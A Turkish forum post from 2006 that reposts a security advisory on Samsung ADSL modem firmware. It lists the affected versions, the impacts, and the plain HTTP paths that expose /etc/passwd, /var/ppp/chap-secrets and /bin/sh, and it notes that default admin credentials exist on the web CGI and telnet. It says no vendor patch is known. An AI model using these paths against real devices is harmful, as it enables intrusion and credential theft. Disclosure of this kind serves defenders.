Samsung ADLS Modemlerde Güvenlik Açığı

Bu başlık kilitlidir. Yeni mesajlar gönderilemez veya mevcut mesajlar düzenlenemez.
Onur OKTAY
01-02-2006, 22:52   |  #1  
OP Yıllanmış Üye
Teşekkür Sayısı: 0
169 mesaj
Kayıt Tarihi:Kayıt: Şub 2006

Açığın ismi : ADSL Modem Çoklu Çapraz Bağlantı Açığı

Etkilenenler : Samsung ADSL Modem Samsung Electronics (co) cpe chipset
software version SMDK8947v1.2 Jul 11 2003 10:00:01
ADSL DMT version a-110.030620-10130710

Etkiler :

1- isteğe göre izin verme açığı

2- bir görevi yerine getirememe yada parola sıfırlama yada parola hatırlamama.

3- sistem girişi izini verme.

Bilgi ( Detay ) : Samsung adsl modemlerin Windows ve Linux İşletim sistemlerine uyumlu olanlarinda Güvenlik zaafiyatı vardır. Güvenlik zaafiyatindan dolayı kullanıcıların izini olmadan sisteme izinsiz port girişleri olmaktadır. HTTP bağlantılarında, protokollerde sorun yaşanmaktadır. Güvenlik zaafiyatindan kullanıcıların olumsuz etkilenmektedir.

Güvenlik zaafiyatı nasil işlemektedir ? :

http://[someSamsung.ip]/etc/passwd
http://[someSamsung.ip]/etc/hosts
http://[someSamsung.ip]/bin/
http://[someSamsung.ip]/dev/
http://[someSamsung.ip]/lib/
http://[someSamsung.ip]/tmp/

http://[someSamsung.ip]/var/ppp/chap-secrets

http://[someSamsung.ip]/bin/sh

Uzaktan yada dışarıdan kötü niyetli kişiler, hacker'lar sisteme giriş yapabilmektedirler. WAN bağlantısı ile yada LAN yolu ile sisteme giriş yapılabilmektedir.

İkinci Güvenlik zaafiyatı ise :

Default user login / passwords exist in both
httpd ( http://[host]/cgi-bin/adsl.cgi) and telnet ports

Kök tanımlama // admin girişi ve kullanıcı adı/şifre bölümündedir.

Çözüm(Yama): Samsung Firmasından şu ana kadar hiç bir yama gelmemiştir. Güvenlik açığından haberdar olduklarindan bile haberdar olunmamaktadır.

Kaynak: SecurityFocus Güvenlik - Olympos Güvenlik

Güvenlik açığı yazarı : SnoB ->> SnoBmsn@hotmail.de